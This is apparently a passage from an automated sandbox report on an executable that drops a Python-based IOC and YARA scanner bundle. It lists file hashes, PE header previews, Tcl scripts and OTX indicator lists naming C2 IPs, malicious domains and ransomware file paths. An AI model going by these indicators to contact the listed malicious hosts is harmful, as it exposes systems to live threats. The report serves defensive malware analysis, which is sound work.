Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`]..$<v.$<v.$<v..s..%<v.:n.'<v.:n..(<v.:n."<v....)<v.$<w..=v.:n."<v.:n.%<v.:n.%<v.Rich$<v.........................PE..L......[...........!.................p..............................................................................pO..b....$.......p..T.......................$9..P................................ ..@...............(............................text............................... ..`.rdata.............................@..@.data...d....P.......6..............@....rsrc...T....p.......R..............@..@.reloc...9.......:...V..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32pdh.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25600
Entropy (8bit):	6.174024922458714
Encrypted:	false
SSDEEP:	384:4UlSJ7oQTvsezqx7BNw1IemFm3RTt+oTiyJKu50XYtLgcFgMHot9K:46QvPzqx7BH1c9uyJL5oYpHFgZt9
MD5:	F51713CEF9B0D97D8647C7D4B0F577E6
SHA1:	83EA250DB8869EA2D3810DC0F6B9B0E0071C74BB
SHA-256:	92ED7BE8109820586B86E97C5EC6A7C39AAAA3A38659B98B857A478B358D66C2
SHA-512:	77E13094140C94B3B6B540CDB4A5A24ECBA06CCAD542498DF7B881D66595B2DE8ACBEE1BB4AD65F6799E2805464027E294F0F8961D7983977B6725E1A9BB6C1F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........EE..$+H.$+H.$+HZ..H.$+H.v.H.$+H.v.H.$+H.v.H.$+H.$*H.$+H.v.H.$+H.v.H.$+H.v.H.$+HRich.$+H........PE..L...b..[...........!.....2...........:.......P.......................................................................m..L....d..d.......T.......................p...pQ...............................a..@............P..T............................text....0.......2.................. ..`.rdata..,....P... ...6..............@..@.data...,....p.......V..............@....rsrc...T............X..............@..@.reloc..\|............\..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32pipe.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	6.134786037546586
Encrypted:	false
SSDEEP:	384:aVOIiDSVujmVnO7aNfnVsDjMDcuR56tHFkHmDYPM8K9cJ:aQ/DSYiVnO7SKuRopQlK9c
MD5:	37D0EEF933F0813E66C96C0E0238613A
SHA1:	6C4922F69439E437423FCD7EDE8B5838B16F6D98
SHA-256:	DB682DB53334FD9C8DF2A9206DE738B26F7C5199586BE02CD917841434141E40
SHA-512:	7AB9FAA2620A71FB7E63A7558C56A2AEC9E41758507FA73895C1A299919351ABB1E687AD3EDA365246475B73F6CA8AE30AAD3A930C95C9D6328EB1F3D19A3372
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............N...N...N3.iN...N.7N...N.!N...N.1N...N...N...N.&N...N.0N...N.3N...NRich...N........PE..L...c..[...........!.....0...*......F8.......@.......................................................................Y..N....M..d....p..T............................A..............................HL..@............@...............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......P..............@....rsrc...T....p.......R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32process.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	6.348876403620652
Encrypted:	false
SSDEEP:	768:pOe22GO+Ka1n+mK85Q/tYckwYtXnxutzjCI0EniNBHuJ4xFO7:pW2GO+Ka1n+mK8y/KiYWiI0EniNBHq4W
MD5:	F80982C6045A71BB289955A63C2CAB28
SHA1:	9B1193D5C43F55726CE6B195CA12C00E36A0A159
SHA-256:	A30A13AED206B0090545A509EE0A1D5470650C849F28E22B7D97CCCC0E42C3E8
SHA-512:	966B1C4305B50703E775D961710654DAABD08E26BAE9E4EBBA39F38450802DC6DF899B8B7EA481CDF5DA33E40B728318DE3138AEB5A87429B8C9D0DF78868B68
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................n......x......h.......0.....................i......j.....Rich............PE..L...h..[...........!.....F...F......jO.......`..........................................................................T...............d............................b..................................@............`...............................text....E.......F.................. ..`.rdata..40...`...2...J..............@..@.data...L............\|..............@....rsrc...d...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32trace.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.7121722125177605
Encrypted:	false
SSDEEP:	384:dSBRJVY+svPnRYsTJWrDf0JIxRqHZHzGAuMrP/i:EBfVY+svvdTsrDfhxChuM7
MD5:	E80949B7C4D5F9360DCEF1064607A1AD
SHA1:	207C2CCBE19A5DE105B3763C6AFE17000E2605D0
SHA-256:	012065E37E4067AB0B35B075225F27CE546A9AEDF336405BC7CE307EB56924F2
SHA-512:	3BB4672CBCF7C4D2CC8C543A30232FA0A360818A4F3416A2B481E2EDB47C877B6535932103B003ACED8B960E152B9924DBBFDFA4EBA492531E5E933EB3DBCE7A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............{@..{@..{@..@..{@..@..{@..@..{@(..@..{@..z@..{@..@..{@..@..{@..@..{@Rich..{@........................PE..L...t..[...........!................P$.......0...............................p.......................................>..P...<7..x....P..\....................`......`1.............................. 6..@............0..@............................text...H........................... ..`.rdata..@....0....... ..............@..@.data........@.......0..............@....rsrc...\....P.......4..............@..@.reloc.. ....`.......8..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32ui.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	779264
Entropy (8bit):	6.3696779666362495
Encrypted:	false
SSDEEP:	12288:008SW0XOKL6+NaYrgBOrNx8pSgv7PvwRZE7AR4wYEssGtPwmS0z6Z3qLmaNPhH88:00cvQt0fz6Z37Uyln
MD5:	AD46B7BD0D0EAE2D23B2A381B60F8FA3
SHA1:	A57A5FA2982143CF357DCAE48C5BCBD48C10B988
SHA-256:	0848D266F6798B81910F7402E3C529C96CFCE26A2C105EAFECC85A89404FEB22
SHA-512:	CAADF25C800EEBA2E61D843202F111BFE028E830032862E3B87FBCB600A1A2BC9B36ACAD5E30E8A26DCFA6B451563DFA33D7355E9F73DA8C90DB1B3EE007F2BA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.4.}.Z.}.Z.}.Z....q.Z..0..\|.Z.c-..~.Z.c-..q.Z.c-..t.Z.}.[..zZ.c-..J.Z.c-..\|.Z.c-..\|.Z.c-..\|.Z.Rich}.Z.................PE..L......[...........!.....J...................`....(..........................P.......F...............................<..!M..$........0.......................P..\|....w..................................@............`...............................text....H.......J.................. ..`.rdata...)...`...*...N..............@..@.data...........^...x..............@....rsrc........0......................@..@.reloc..\|....P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\win32wnet.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25088
Entropy (8bit):	6.090000439361444
Encrypted:	false
SSDEEP:	768:tRZ5g+l3KQZrpJI+LXEJVIs+AYOtr5OE950262R:tRZ5g+l3KQZrpfLXEJVIs+AYOtL9502Z
MD5:	C62F05CF853E438A1142F4D6FC60F6EA
SHA1:	14B7B6BD9EECDF57D3DAF2AD88B989C330B2A2F8
SHA-256:	9F0E09D458393DEECA40207F5E89CF705C63B93CF759E8E4952F706ADEFC9704
SHA-512:	9A9E5A9C534C6D8193E167788A3E349E11576D33630FB61CB1C5905CF1727BFFCEDF631FE9C20FD5F790979B3DD99069DBEDC469D0A7340A39C8773B7B054E20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d^._.0._.0._.0..J..^.0.AW..^.0.AW..R.0.AW..Y.0....X.0._.1.?.0.AW..X.0.AW..^.0.AW..^.0.Rich_.0.........................PE..L...w..[...........!.........0.......5.......@......................................................................@Y.. ...lN.......p..T.......................p....A...............................K..@............@...............................text...J,.......................... ..`.rdata..`....@... ...2..............@..@.data...l....`.......R..............@....rsrc...T....p.......X..............@..@.reloc..~............\..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\winxpgui.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	318464
Entropy (8bit):	6.816628763663281
Encrypted:	false
SSDEEP:	6144:HBKc5gO1BjloweC80BBQXuvAPQLMKXAZNLHqHi9Oo8O41:HBKc5gO1BjlowQ0BBQXuvA4LXoNW8q31
MD5:	D0321B1ED9E33D3DEFB14F3F4AA12ECB
SHA1:	02CD1ACC0739C2A79B33716701A84C6C8DB8DD8F
SHA-256:	2A31174C15B1A19F53161F45758C4821B380620E519FC343D4D99CC391212B8D
SHA-512:	C3C74F9EDA0C493DF3BC92005EBA8E5BADEB05C4207B064794975FA5B8FCE9D3BDFD85615B24442ABABE19B125ABF8D65C6D74112434D1E0C097D8082A9098AE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.=T>.nT>.nT>.nJl.nB>.nJl.n.>.nJl.nP>.n..Tn]>.nT>.n.?.nJl.ns>.nJl.nU>.nJl.nU>.nJl.nU>.nRichT>.n................PE..L......[...........!.....\|...\......(................................................................................d..b...D9..................................lN..................................P*..@...............\............................text...v{.......\|.................. ..`.rdata..............................@..@.data....9...p.......V..............@....rsrc...............................@..@.reloc..,O.......P..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\lib\yara.pyd Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1240064
Entropy (8bit):	6.805558268113778
Encrypted:	false
SSDEEP:	24576:smD/F6SQ1oZg49vgpEn8wdxTCrJykukMh4k+LQBMyBMpxYa43kef:ZtVglpE8spQSS9yBMpxYkef
MD5:	9832A3353831EB90BD2E84CFF5553CDE
SHA1:	CC95073DC09CB89400A6503032649D6EA2CAEE29
SHA-256:	0C1F24D87A4C2B84DD0C020677285819E02B1E1A504F754F1D0748463EF938C8
SHA-512:	1653F9C7AD78232F9E031BC2B307020EEE45AED1FE86C1B66779BD64AF2F72BB704518EFA8AD1B7A6F59D6080D6409F9774A65764549F48F1F479863B3877F16
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V{..8(..8(..8(..(..8(..(..8(..(..8(..(..8(..9(..8(..(v.8(..(.8(..(..8(..(..8(Rich..8(................PE..L...X..\...........!.........l...............................................@.......................................C..D....................................p......................................-..@............................................text...j........................... ..`.rdata.............................@..@.data........P......................@....reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\msvcm90.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	225280
Entropy (8bit):	6.037671591812755
Encrypted:	false
SSDEEP:	6144:FmOMqcQXAXzwYjOWcNpJKO82NWqzf6fW3/amiX2Oym:F5XcuAXzUMqb6fW3/ami
MD5:	A2E9006871561A8B7C817E0E5F428817
SHA1:	4495C0E1B6AF43C0D8EEF876940C115D0D7B45AE
SHA-256:	5B44A41559DFCF7D5BC22DED1A3433F0F19E51ECCF17FDB3224BA2C617061EEE
SHA-512:	1894F2DE0C94EE52346F81F7ECD36BF968ABBA97EE67D7BC4AB9D172190A3B17291BB837ABF211ED5EED86276DD6FD46216FF3720008BB069D0C8695007098D2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;...h...h...h..ah...h1.dh...h..gh...h...h...h.-.h...h...h...h..qh...h..vh...h..`h...h..fh...h..ch...hRich...h........................PE..L.....i[...........!.....:..........Z........P....?x.........................0............@......................... 3..4....&..d...............................d...P...............................H...@...............(...........p...H............text...T9.......:.................. ..`.data........P.......>..............@....rsrc................H..............@..@.reloc...#.......$...L..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\msvcp90.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	570496
Entropy (8bit):	6.5259314477231305
Encrypted:	false
SSDEEP:	12288:BpFE340h3e34GVZQACkIPYhUgiW6QR7t5183Ooc8SHkC2eLgAfO:Bph0h3e3vgzPA83Ooc8SHkC2eLgAfO
MD5:	90A32D8E07F7FB3D102EAB1DA28F0723
SHA1:	0903911BBB5D00F68BA51895FA898B38A5453DED
SHA-256:	004ED24507DC7307CEC1A3732FA57EABF19E918C3E1B54561E6CC01F554C0B77
SHA-512:	2C69586D5C5D2B4B5DECF2BF479554C3D0FF5F5A6FBACB01B8583EA8D96D0AE9C850C30A0D43EB2AD1116BE901578D15FE08FCE3E505440C854082C208A79F1A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L.....i[...........!.....4...p..............P....Hx......................................@..........................P..,....E..<...............................D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\msvcr100.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\otx-c2-iocs-ipv4.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	299141
Entropy (8bit):	5.387212552393288
Encrypted:	false
SSDEEP:	1536:yrny6bJvXQFdCMSqLU+v+1+O+H+t+j+G+a+D+H+7+U+c+W+l+g+a+d+a+Y+k+o+Z:qpd8SqLU+PEQ0TPpvpepwpTpfU
MD5:	DB899FC55DFFCB1F7272D8311E8A4C83
SHA1:	8C171C5A8119AE8EAB73ECE5E4091A200E75CEC9
SHA-256:	4C7E5D223592EC36C078D29C8C0759B406D94A67CC2FF4E6625EA2345D230403
SHA-512:	576146DB12EB6762F1C773C96DEF2A7AC93FD284EA2425B439948F4F0314A1F71900C629389D7DFB821F599628611E910655A198FDC8C14705E711D9B51C70D6
Malicious:	false
Preview:	103.85.226.65;Drive-by download campaign targets Chinese websites, experiments with exploits https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experimen.185.203.116.126;AzorUlt Version 2: Atrocious Spyware infection using 3 in 1 RTF Document https://cysinfo.com/azorult-version-2-atrocious-spyware-infection-using-3-1-rtf-.45.77.49.118;OSX/Coldroot RAT https://digitasecurity.com/blog/2018/02/19/coldroot/.50.63.202.38;Aveo Malware Family Targets Japanese Speaking Users http://researchcenter.paloaltonetworks.com/?p=17203.104.202.173.82;Aveo Malware Family Targets Japanese Speaking Users http://researchcenter.paloaltonetworks.com/?p=17203.107.180.36.179;Aveo Malware Family Targets Japanese Speaking Users http://researchcenter.paloaltonetworks.com/?p=17203.185.82.202.170;MTA 2016-05-10 - TUESDAY MALSPAM HUNT - CERBER, LOCKY http://malware-traffic-analysis.net/2016/05/10/index.html.69.162.104.130;MTA 2016-05-10 - TUESDAY MALSPAM HUNT - CERBER, LOCKY http://malware-traffic

C:\Users\user\Desktop\otx-c2-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4406805
Entropy (8bit):	5.185051720745061
Encrypted:	false
SSDEEP:	49152:KpRHB6sl1uHaXvrVPmbGzGxmixP4Mtosl3ueeRJBkDhYR7mI5KG:G
MD5:	FBFD431BF049CAE5228E316E65D98D4F
SHA1:	4B848B149164B4A9C3BAB6512DCC56646C3A0236
SHA-256:	39B94814919744D090C019A744B57A494CDD1B2920DCC3FE07FB244822F9DBB1
SHA-512:	7882F2ED8BDAC7CB1308D244F4C35815376DF70BA234DB6C696816210B81B318B4FC9C33B49BBA030D31E2A9BD64FFC8CBA235AA189416ED0760BAF77D7BE78F
Malicious:	true
Yara Hits:	Rule: APT10_Malware_Sample_Gen, Description: APT 10 / Cloud Hopper malware campaign, Source: C:\Users\user\Desktop\otx-c2-iocs.txt, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\Desktop\otx-c2-iocs.txt, Author: Joe Security
Preview:	safe-storage.biz;Flash Exploit, CVE-2018-4878, Spotted in The Wild as Part of Massive Malspam Campaign https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi.www.zxcvb.pw;Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulner.zxcvb.pw;Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulner.shiquanxian.cn;Drive-by download campaign targets Chinese websites, experiments with exploits https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experimen.ccnew.mm.my;Mirai-based Bot Turns IoT Devices into Proxy Servers https://blog.fortinet.com/2018/02/21/omg-mirai-based-bot-turns-iot-devices-into-.rpnew.mm.my;Mirai-based Bot Turns IoT Devices into Proxy Servers https://blog.fortinet.com/2018/02/21/omg-mirai-based-bot-turns-iot-devices-into-.www.alkra

C:\Users\user\Desktop\otx-filename-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1972
Entropy (8bit):	5.229125835335747
Encrypted:	false
SSDEEP:	48:PfuNsaNsb/rHYhopcyho/DiODiziqQApiqwAquJfJ9Jb:3u3IYepteuzr5tZquJfJ9Jb
MD5:	AF1E35C3CA64C628D3D8C0A75C0A32F8
SHA1:	20399EBAB81608F666EC63C2744F0EA2F38319E4
SHA-256:	708F1883715E084926DE9971B0D69D0A2674367F4893B57F13B6B46DBD9CA939
SHA-512:	3B00966CF6AD2391D71F38232861EDC08B950E4D2ACD30CA7AEB484181F6320D8F02C41F9A532DFA3464DED37D4C7DB1684F5F4F4626AE7DCAF619341AE520AE
Malicious:	false
Preview:	%AppData%\\Local\\Temp\\bootloader\.dec;RTF Exploit Installs Italian RAT: uWarrior http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-.%AppData%\\Roaming\\warriors\.dat;RTF Exploit Installs Italian RAT: uWarrior http://researchcenter.paloaltonetworks.com/2015/08/rtf-exploit-installs-italian-.dllhost\.dat;Petya Ransomware Fast Spreading Attack https://twitter.com/JoKe_42/status/879693258183647232 / https://twitter.com/crai.C:\\WINDOWS\\tasksche\.exe;WannaCry Indicators https://ghostbin.com/paste/xgvdv / https://www.alienvault.com/blogs/labs-researc.C:\\Windows\\mssecsvc\.exe;WannaCry Indicators https://ghostbin.com/paste/xgvdv / https://www.alienvault.com/blogs/labs-researc._DECRYPT_FILE\.html;Erebus Resurfaces as Linux Ransomware http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-._DECRYPT_FILE\.txt;Erebus Resurfaces as Linux Ransomware http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-./Users/_%Use

C:\Users\user\Desktop\otx-hash-iocs.txt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7884338
Entropy (8bit):	5.498775480283331
Encrypted:	false
SSDEEP:	24576:iTjiCZRvv5xNZfMpFBL4gwYME6QQhytApTYApuzLZVv3FrJOflPvNE1uGxl0fKMJ:c5xNZfMpFBL3v3FrJ+t
MD5:	3DB2AA95C5FF96EE48CA515B87ED8522
SHA1:	B068B2F5DB2331707182BA048CA064DEFAECAB03
SHA-256:	239AFBBB2E3D2B3AE04EE67D8349C51E2919942DA514AD0C216C9680B60637D0
SHA-512:	D937370478224EB357EF06547C3A6A00B7265B4D38BBDB09D101A2F6804B2E6069339A00E8B308BB0BB047F68908C495B028FD209745C7FB7D3FA94C231A9018
Malicious:	false
Preview:	176AD6129ECE312F128A3195BF5AFC130801F2E849F89BC97610C1CE8D730772;Flash Exploit, CVE-2018-4878, Spotted in The Wild as Part of Massive Malspam Campaign https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi.6374349443708C96AD41B3F9B891B33F7DEC65FDF13E6B424D4D0AB7969C5E71;Flash Exploit, CVE-2018-4878, Spotted in The Wild as Part of Massive Malspam Campaign https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi.6F2C41E665AAB873D213583697D70EE79AD59A2B649164C15BD63518B09C429D;Flash Exploit, CVE-2018-4878, Spotted in The Wild as Part of Massive Malspam Campaign https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi.862C6EF1D24D2CBA9878B5E919683629C3516D9121F5CF703FF1CA42E2A06A77;Flash Exploit, CVE-2018-4878, Spotted in The Wild as Part of Massive Malspam Campaign https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massi.EAF0F57CBCBDA0DBD2C60C5719731DDEAB76B6A10367D2679854202FDCA27388;Flash E

C:\Users\user\Desktop\python27.dll Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2649600
Entropy (8bit):	6.722420193769921
Encrypted:	false
SSDEEP:	49152:Mq1WL6TfbVYU9U/EaP/iv4CMbxndsBbWA8LEkt34PMnhMmQHNZlhId1Tfcd+yW3d:1WL6UPI4CMbxdeZAhXhMnHXledIpm
MD5:	2FEB5AD28FAE3DE286803C6CCC6491C0
SHA1:	C1A2CEEAF37778BBE0A187E8B6CC12E488224028
SHA-256:	E2460663CB2E97DD61AFB42E0310C026B8417D6C2C135F54D2DA90696BEA6FA4
SHA-512:	37D2FB967742A1207DFE763C276B7A1AE515F50A4D9D01A83951FF69D87FD33ED1CDBAB978AE8D3D7499CE7D0C3E756DC53711EA66E7B6E06758BCC511664B25
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Bu....{...{...{..[...{..l...{..l....{..l....{..l...{...z.<.{..l..{..l...{..l...{..l...{.Rich..{.................PE..L.....\|\...........!.........................................................).....V.(...@..........................g!..\|...P!.x....@(......................P(.P\.. ................................O!.@............................................text...z........................... ..`.rdata...D.......F..................@..@.data...0C....!..(....!.............@....rsrc........@(.......&.............@..@.reloc...f...P(..h....'.............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\status.log Download File
Process:	C:\Users\user\Desktop\vnwareupdate.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.459012079154174
Encrypted:	false
SSDEEP:	3:VX5AWFhM7tGcXmQsH:95zFhIVy
MD5:	0CC9CA4EEBC24138DD2670414CC67BF8
SHA1:	7955920ECD07264255CDC1F19F6567D46B64089A
SHA-256:	9B3137480785AD1A388E6FD43A9B0F5834B71108668161DC4CDEF6FC7FB5C25B
SHA-512:	8263B326E0AC3A34D873D7FEA2FBB4A50D014B5BB4D75616A101ED9B577B93B0FD9B392556A2FA7B62F3888E9901B90B3C331CF70DB9B57FEC5CA6828FC67BB6
Malicious:	false
Preview:	Yara rules decryption took 1.12399260615 seconds.

C:\Users\user\Desktop\tcl\auto.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20622
Entropy (8bit):	4.702090946165969
Encrypted:	false
SSDEEP:	384:XVJ4cB1RJtA61ZX2pP9leP9R5Hx39kcaBXhTEFHOW2ezBWdtnH:r4cB1RJtA61ZGpP/ePv39kc+6HOW2ezG
MD5:	3CB566DC97AC449B52D3952FDB7991C6
SHA1:	91300BC60D2A3156D4FC1D263726134F06325196
SHA-256:	6082F2EB2AF9CD53FD5AC819B19ACBF428027107CE0B80D9AD836CDE1D091B43
SHA-512:	F7D3B6D39BCB9E9C9BFF2E36852F15550C850DC5E8FD5DE150739A37F03179820430FFB6501465B6AB64CC7F2CAF11679C7FBDAADE7074FC61670138A715C92B
Malicious:	false
Preview:	# auto.tcl --.#.# utility procs formerly in init.tcl dealing with auto execution.# of commands and can be auto loaded themselves..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# auto_reset --.#.# Destroy all cached information for auto-loading and auto-execution,.# so that the information gets recomputed the next time it's needed..# Also delete any commands that are listed in the auto-load index..#.# Arguments: .# None...proc auto_reset {} {. global auto_execs auto_index auto_path. if {[array exists auto_index]} {..foreach cmdName [array names auto_index] {.. set fqcn [namespace which $cmdName].. if {$fqcn eq ""} {continue}.. rename $fqcn {}..}. }. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath. if {[catch {llength $auto_path}]} {..set auto_

C:\Users\user\Desktop\tcl\clock.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	130266
Entropy (8bit):	4.996819531498253
Encrypted:	false
SSDEEP:	3072:YklVEuKDDeJrJGjGAui+ur0keui1IsE8csTImhrudLzprnl2EMwlU/oTHHSSyQSy:EDDeJrJvAui+ur0keui1R5csTImhr6Lp
MD5:	3AD7ED0D9A7B03A20D993B1D66BF5B15
SHA1:	EAD405C4F731810944FD02A737D553D13E8D9197
SHA-256:	D2AEFFA593947CA60BDA3EC7AE9D2B54273F9ED2F4A3D0B630A157AB3CD98FD4
SHA-512:	EA76B3C49A215E7D3FFCC4B8463E2D2B5752643769A6C12D0B907C2A80A497FCDD390119B51612B2E4958A3E9589A3C6A706756A1611108076A79D5D790FDC00
Malicious:	false
Preview:	#----------------------------------------------------------------------.#.# clock.tcl --.#.#.This file implements the portions of the [clock] ensemble that.#.are coded in Tcl. Refer to the users' manual to see the description.#.of the [clock] command and its subcommands..#.#.#----------------------------------------------------------------------.#.# Copyright (c) 2004,2005,2006,2007 by Kevin B. Kenny.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.#----------------------------------------------------------------------..# We must have message catalogs that support the root locale, and.# we need access to the Registry on Windows systems...uplevel \#0 {. package require msgcat 1.4. if { $::tcl_platform(platform) eq {windows} } {..if { [catch { package require registry 1.1 }] } {.. namespace eval ::tcl::clock [list variable NoRegistry {}]..}. }.}..# Put the library directory into the namespace

C:\Users\user\Desktop\tcl\encoding\ascii.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	2.009389929214244
Encrypted:	false
SSDEEP:	12:5TUvEESVrVJ/eyN9j233V2NdWTeVCT0VbsV7EV7sYnVAMmVZyg851VqxsGkl/:5TUmJvRju3ShVbsZiAMiZyb7PF
MD5:	68D69C53B4A9F0AABD60646CA7E06DAE
SHA1:	DD83333DC1C838BEB9102F063971CCC20CC4FD80
SHA-256:	294C97175FD0894093B866E73548AE660AEED0C3CC1E73867EB66E52D34C0DD2
SHA-512:	48960E838D30401173EA0DF8597BB5D9BC3A09ED2CFFCB774BA50CB0B2ACCF47AAD3BA2782B3D4A92BEF572CBD98A3F4109FC4344DB82EB207BFDE4F61094D72
Malicious:	false
Preview:	# Encoding file: ascii, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\big5.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
